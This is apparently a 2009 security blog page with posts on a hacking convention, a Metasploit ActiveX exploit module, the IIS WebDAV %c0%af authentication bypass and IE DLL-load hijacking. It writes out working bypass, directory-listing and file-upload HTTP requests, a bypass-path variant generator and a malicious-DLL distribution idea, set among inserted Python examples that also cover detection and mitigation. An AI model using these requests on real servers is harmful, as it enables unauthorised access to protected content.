Posted by Trancer on May 31 2009

A week ago on Sunday I attended IL.Hack, the Israeli hacking convention for 2009. I really enjoyed the convention and I think the Israeli hacking community needs this kind of event at least once a year. I'd like to thank Yaniv Meron (Lament), the convention's initiator and organizer, for making it all happen. I sure was skeptical about this convention at first, but it turned out to be great.
The best part of the convention for me was meeting everyone, whether people I already knew or new people I met, making new connections and sharing information.
The lectures were not as professional as I'd expect them to be, but hey, I guess when you plan a lecture for a variety of people with different levels of knowledge it can't be truly hardcore.
The first lecture, by Jonathan Klinger (blog), about hacker films and the hacker image was really awful in my opinion. Klinger didn't get the point of the lecture across very well, his presentation was far from finished and he kept getting mixed up with the movie snippets he wanted to show. The second lecture, by Yaniv Meron about steganography, was too basic in my opinion. Yaniv demonstrated two message-hiding techniques, the first hiding a message within a bitmap file and the second within a sound file. I can compare it to a lecture about cryptography demonstrating something as basic as the Caesar cipher. Yaniv didn't show any tools that can be used for steganography (both hiding and unhiding data), didn't talk about the history of steganography and didn't give any mitigation techniques or protections against steganography attacks (for example, stealing data from your company). Anyway, I didn't go to the rest of the lectures; I heard the third one, about web site security, was also very basic, demonstrating plain XSS and CSRF attacks. But I also heard the last two lectures were good.

To sum it up, IL.Hack 2009 was great, I had a lot of fun and I hope next year it will be even better.
See you on IL.Hack 2010.

Press and buzz: (Hebrew)
IL.Hack 2009 web site.
Calcalist.
Calcalist (second article).
Newsgeek.
Crictor (and in Hebrew).
Crictor – Interview with Avi Weissman (IFIS, See Security).
iTK98’s blog.
Channel 1 (mms streaming – minute 33).
Pictures by An7i and me.
Also, search #ilhack and #ilhack2009 on Twitter.

Categories: Rec-Sec


Posted by Trancer on May 27 2009

Before: [image: IronKey - Before]
After: [image: IronKey - After]

It wasn’t that hard :P

Categories: LOLz


Posted by Trancer on May 24 2009

Wrote a new Metasploit exploit module for the AOL Radio AmpX ActiveX control ConvertFile() stack-based buffer overflow vulnerability.

This module exploits a stack-based buffer overflow in the AOL IWinAmpActiveX class (AmpX.dll) version 2.4.0.6, installed via the AOL Radio website. By passing an overly long value to ConvertFile(), an attacker can overrun a stack buffer and execute arbitrary code.

This vulnerability was found by rgod and was published recently by Nine:Situations:Group. There is still no patch from AOL; if you want to test it, you can get the vulnerable package here on the AOL Radio web site.

Download aol_ampx_convertfile.rb.
Also on Metasploit.

References:
BID 35028
OSVDB 54706
milw0rm 8733

Categories: Exploits, Metasploit


Posted by Trancer on May 21 2009

Now this is classy: a few days ago Kingcope (Nicolaos Rangos) disclosed a remote authentication bypass vulnerability in the Microsoft IIS 6 WebDAV service. In the advisory Kingcope details some of this vulnerability's attack vectors, such as reading files within password-protected folders and directory listing of password-protected WebDAV folders. In some server configurations it is also possible to upload files to WebDAV-protected folders. The vulnerability exists because WebDAV fails to properly handle the overlong Unicode (UTF-8) encoding of the '/' character, %c0%af.

This reminds me of the good old Microsoft IIS 4/5 Unicode vulnerability, which was used to mass-own the Internet back in 2000-2001, what a fun vulnerability it was ^_^.

Microsoft has released a security advisory (971492) and the SRD team published two posts clarifying many of the details of this vulnerability:
More information about the IIS authentication bypass.
Answers to the IIS WebDAV authentication bypass questions.

Here’s a summary of the details so far:

  • Microsoft IIS 5.0 (Windows 2000), IIS 5.1 (Windows XP) and IIS 6.0 (Windows Server 2003) are vulnerable.
  • Microsoft IIS 7.0 (Windows Server 2008) is safe.
  • To exploit this vulnerability, WebDAV service must be enabled.
  • WebDAV is disabled by default in IIS 6.0.
  • To exploit this vulnerability, IIS server must use IIS permissions to restrict a subfolder of content to authenticated users.
  • IIS server that doesn’t use IIS permissions to restrict content to authenticated users is safe.
  • To exploit this vulnerability, file system access must be granted for the restricted content to the IUSR_[MachineName] account.
  • IIS server that does not grant filesystem access to the IUSR_[MachineName] account is safe.
  • A parent folder of the private subfolder must allow anonymous access.
  • The vulnerability affects websites implementing Basic, Digest or Integrated Windows (NTLM) authentication.
  • IIS server that hosts web applications using only forms-based authentication is safe.
  • If the IUSR_[MachineName] account has write access to WebDAV folders, it is possible to upload content to the web server.
  • Microsoft SharePoint Server is safe.
  • Microsoft Outlook Web Access (OWA) Server is safe.

Exploiting the WebDAV remote authentication bypass vulnerability

Authentication bypass of password protected folders:
http://www.vulnerable.com/webdav%c0%af/sensitive.zip

Directory listing of password protected folders:
PROPFIND /web%c0%afdav/ HTTP/1.1
Host: www.vulnerable.com
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

Writing files to password protected folders:
PUT /web%c0%afdav/foo.html HTTP/1.1
Host: www.vulnerable.com
Translate: f
Content-Length: 15
Content-Type: text/html

<h1>w00t!!</h1>
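The three requests above all rest on one detail: %c0%af is an overlong two-byte UTF-8 encoding of '/' (0x2F) that a conforming decoder must reject but that the vulnerable WebDAV code accepts. The Python below is an added example, not code from this post, from kcope's advisory or from Metasploit. It decodes the sequence both strictly and leniently, shows a raw-string protected-folder check that the encoded form slips past (that the check runs before the sequence is decoded is an assumption of the example, not something the page states), generates the variant paths a scanner would try, and flags overlong slashes in constructed log lines. The folder name, the log lines and the function names are made up for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong percent-encoded spellings of U+002F '/'.  %c0%af is the one on the
# page; the 3- and 4-byte forms are the other overlong encodings of the same
# code point and are included for the log check only.
OVERLONG_SLASH = re.compile(rb"%c0%af|%e0%80%af|%f0%80%80%af", re.IGNORECASE)


def lenient_decode(data: bytes) -> str:
    """UTF-8 decoder that accepts overlong two-byte sequences (lead byte C0/C1).

    A conforming decoder must reject C0 AF; a decoder that accepts it yields '/'.
    Only ASCII and two-byte sequences are handled, which is all the page needs.
    """
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            raise ValueError(f"unsupported byte sequence at offset {i}")
    return "".join(out)


def strict_decode(data: bytes):
    """Conforming decoder: Python's codec rejects overlong forms, so return None."""
    try:
        return data.decode("utf-8")
    except UnicodeDecodeError:
        return None


def canonicalise(raw_path: str) -> str:
    """Percent-decode a request path, then decode the bytes leniently."""
    return lenient_decode(unquote_to_bytes(raw_path))


def raw_prefix_check(raw_path: str, protected_prefix: str) -> bool:
    """Authorisation decision taken on the raw request path.

    Assumption (see lead-in): the protected-folder match runs before %c0%af is
    decoded, so /web%c0%afdav/ does not match /webdav/ and no credentials are
    demanded, while the later file access still reaches the folder.
    """
    return raw_path.lower().startswith(protected_prefix.lower())


def bypass_variants(protected_path: str) -> list:
    """Candidate paths with %c0%af at each interior position of the folder name.

    The page shows one position (/web%c0%afdav/); a scanner would try them all.
    """
    folder = protected_path.strip("/")
    return [f"/{folder[:i]}%c0%af{folder[i:]}/" for i in range(1, len(folder))]


def find_overlong_slash(log_lines) -> list:
    """(line number, matched token) for every log line carrying an overlong '/'."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = OVERLONG_SLASH.search(line.encode("ascii", "replace"))
        if m:
            hits.append((n, m.group(0).decode("ascii")))
    return hits


# Constructed sample lines, not real traffic: method, URI and status.
SAMPLE_LOG = [
    "GET /webdav/sensitive.zip 401",
    "GET /webdav%c0%af/sensitive.zip 200",
    "PROPFIND /web%C0%AFdav/ 207",
    "PUT /web%e0%80%afdav/foo.html 201",
    "GET /public/index.html 200",
]

if __name__ == "__main__":
    print(canonicalise("/webdav%c0%af/sensitive.zip"))      # /webdav//sensitive.zip
    print(strict_decode(b"/webdav\xc0\xaf/sensitive.zip"))  # None
    print(raw_prefix_check("/web%c0%afdav/", "/webdav/"))   # False
    print(bypass_variants("/webdav/"))
    print(find_overlong_slash(SAMPLE_LOG))
```

The log check is deliberately case-insensitive and covers the longer overlong forms as well, since a signature that only matches the literal lower-case %c0%af is exactly the kind of thing the evasion write-up linked in the updates below is about.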

Testing tools

Further information

That’s it for now, great find by kcope indeed.

Updates:

>> Check out this blog post by Todd Manning of BreakingPoint Labs – ‘Slash’ and Burn – The IIS 6.0 WebDAV Bug – Gives interesting information about this vulnerability and IDS/IPS signature evasion techniques.
In addition, ET added an HTTP WebDAV Scanner to Metasploit – wmap_dir_webdav_unicode_bypass.rb.
From SANS ISC Diary – IIS admins, help finding WebDAV remotely using nmap.

>> From Thierry Zoller – the IIS WebDAV Unicode vulnerability also allows bypassing IP address and domain name restriction configurations. This keeps getting better and better… :-)

>> WebDAV unicode vulnerability overview by Steve Friedl – Understanding Microsoft’s KB971492 IIS5/IIS6 WebDAV Vulnerability.

>> Microsoft has patched the IIS WebDAV Unicode authentication bypass vulnerability – MS09-020.
It's about time.

Categories: Vulnerabilities


Posted by Trancer on May 12 2009

A month ago, on Black Tuesday of April 2009, Microsoft patched a handful of vulnerabilities, some of them known for quite some time now.
In this post I'll talk about one vulnerability in particular – the DLL-load hijacking vulnerability in Microsoft Internet Explorer 7, which was found by Aviv Raff in October 2006.
The DLL-load hijacking vulnerability causes Internet Explorer to load specific DLL files (imageres.dll, schannel.dll and sqmapi.dll) from the desktop when it is started. An attacker may leverage this vulnerability to execute arbitrary code in the context of the application by placing a specially crafted DLL file on a user's desktop.

So why did Microsoft patch a security bug only after two and a half years? Well, that's a long story.
At first, Microsoft classified this issue as a "bad behavior" bug and, despite Aviv's warnings, attached no security considerations to it. Microsoft stated that if an attacker was able to create a specially crafted DLL file on a user's desktop, that desktop must already have been compromised. Then in December 2006 Aviv published PoC exploit code for the vulnerability on milw0rm, and still no patch from Microsoft. Even in April 2008, when Windows XP SP3 was released, Microsoft had not provided a solution or a workaround of any kind for this issue.

In May 2008, Nitesh Dhanjani detailed several vulnerabilities found in Apple Safari, one of them the "Safari Carpet Bomb" vulnerability, which enabled an attacker to force the browser to download files without the user's consent. The default download path of Apple Safari for Windows is the user's desktop.
Combining the DLL-load hijacking vulnerability and the Safari Carpet Bomb vulnerability, Aviv was able to demonstrate a fully automated remote code execution attack. With the help of Ryan Naraine, Microsoft and Apple started taking these issues seriously after the two sent Microsoft the proof of concept. Microsoft released a security advisory for this "blended threat" and eventually, in June 2008, Apple fixed the Safari Carpet Bomb vulnerability.
And then in April 2009, two and a half years after Aviv reported this issue, Microsoft finally patched the DLL-load hijacking vulnerability.
You can read a detailed disclosure timeline in this blog post by Aviv Raff. Further information regarding this "blended threat" can be found under CVE-2008-2540 and BID 29445.

To mitigate this issue, Microsoft released two patches:
MS09-014 – a cumulative security update for Internet Explorer. Regarding the DLL-load hijacking vulnerability, this patch modifies the way Internet Explorer loads files from the desktop.
MS09-015 – providing additional defense-in-depth protection. With this patch Microsoft introduced a new API, SetSearchPathMode, which sets the per-process mode used by the SearchPath function when locating files and lets an application force the current directory to be searched after the application and system locations rather than before them.
Additional information about these patches can be found in the security bulletins and in this post on the Microsoft Security Research & Defense blog.
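To make the search-order point concrete, here is an added example (not code from this post, from Aviv Raff or from Microsoft) that models the SearchPath lookup order in its default mode and in the safe-search mode SetSearchPathMode enables, then resolves the DLL names the post lists against a constructed in-memory file system in which planted copies sit on the desktop, the current directory in the post's scenario. The directory paths, the desktop location and the assumption that sqmapi.dll has no copy in the system directories are all made up for the example.

```python
from pathlib import PureWindowsPath
from typing import Optional

# Constructed locations; nothing here comes from a real machine.
APP_DIR = r"C:\Program Files\Internet Explorer"
SYSTEM_DIR = r"C:\Windows\System32"
SYSTEM16_DIR = r"C:\Windows\System"
WINDOWS_DIR = r"C:\Windows"
PATH_DIRS = [r"C:\Windows\System32\Wbem"]
# The current directory in the post's scenario: the user's desktop.
DESKTOP = r"C:\Documents and Settings\user\Desktop"


def search_order(current_dir: str, safe_mode: bool) -> list:
    """Directories SearchPath() consults, in Microsoft's documented order.

    Default: application directory, then the current directory, then the
    system and Windows directories, then PATH.  With safe search mode
    (SetSearchPathMode, MS09-015) the current directory drops to just before PATH.
    """
    if safe_mode:
        return [APP_DIR, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR, current_dir, *PATH_DIRS]
    return [APP_DIR, current_dir, SYSTEM_DIR, SYSTEM16_DIR, WINDOWS_DIR, *PATH_DIRS]


def resolve(dll: str, current_dir: str, safe_mode: bool, filesystem: set) -> Optional[str]:
    """First existing copy of `dll` along the search order, or None."""
    for directory in search_order(current_dir, safe_mode):
        candidate = str(PureWindowsPath(directory) / dll)
        if candidate.lower() in filesystem:
            return candidate
    return None


def hijacked(dll: str, current_dir: str, safe_mode: bool, filesystem: set) -> bool:
    """True when the copy that wins is the one sitting in the current directory."""
    found = resolve(dll, current_dir, safe_mode, filesystem)
    return found is not None and found.lower().startswith(current_dir.lower() + "\\")


def constructed_filesystem() -> set:
    """In-memory file system for the example (lower-cased full paths).

    Legitimate copies of two of the DLLs the post names live in System32; an
    attacker has planted all three on the desktop.  That sqmapi.dll has no
    copy in the system directories is an assumption made for the example.
    """
    return {p.lower() for p in [
        SYSTEM_DIR + r"\schannel.dll",
        SYSTEM_DIR + r"\imageres.dll",
        DESKTOP + r"\schannel.dll",
        DESKTOP + r"\imageres.dll",
        DESKTOP + r"\sqmapi.dll",
    ]}


if __name__ == "__main__":
    fs = constructed_filesystem()
    for dll in ("schannel.dll", "imageres.dll", "sqmapi.dll"):
        for safe in (False, True):
            print(f"{dll:13} safe_mode={safe!s:5} -> {resolve(dll, DESKTOP, safe, fs)}")
```

What the model shows is why MS09-015 is only defense in depth: safe search mode rescues a DLL that has a legitimate copy earlier in the order (the planted schannel.dll loses to System32 once the current directory is moved back), but a name with no copy in the system directories is still resolved from the desktop, so the change to how Internet Explorer itself loads from the desktop in MS09-014 is the part that actually closes the hole.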

And now for the interesting part, what Microsoft DOESN'T want you to know.
As stated in the MS09-014 security bulletin, the DLL-load hijacking vulnerability affects Internet Explorer 7 and lower versions. Internet Explorer 8 users are immune to this vulnerability, Microsoft claims.
This statement is not true: Internet Explorer 8 (RTM, build 8.0.6001.18702) is, in fact, vulnerable to the DLL-load hijacking vulnerability. Not only that, this is not the only vulnerability patched in MS09-014 that affects Internet Explorer 8, but that's a subject for another blog post.
Here’s a video demonstrating the attack on IE8 – ie8_dll_hijack.swf.

Also, Internet Explorer is not the only application vulnerable to the DLL-load hijacking vulnerability. Almost every Microsoft application I’ve tested is vulnerable and also some third party applications. For example, Microsoft Office 2007 is vulnerable.
Here’s a video demonstrating the attack on Microsoft Office Word 2007 – office_dll_hijack.swf.

As I mentioned, at first Microsoft didn't consider this issue to be a security vulnerability, because an attacker would have to create a specially crafted DLL file on a user's computer to exploit it. Well, I can come up with many ways to leverage this attack, for example using P2P file-sharing applications and protocols such as BitTorrent. Attackers can distribute warez (movies, software, books etc.) packed into a ZIP or RAR file, add a malicious DLL file and a readme .html or .doc file (or both) to the package, and once the victim downloads the malicious package and opens the readme file – GAME OVER.

So, does Microsoft lie to its customers in security bulletins? It probably does… Have a happy Black Tuesday! :-)

Categories: Vulnerabilities

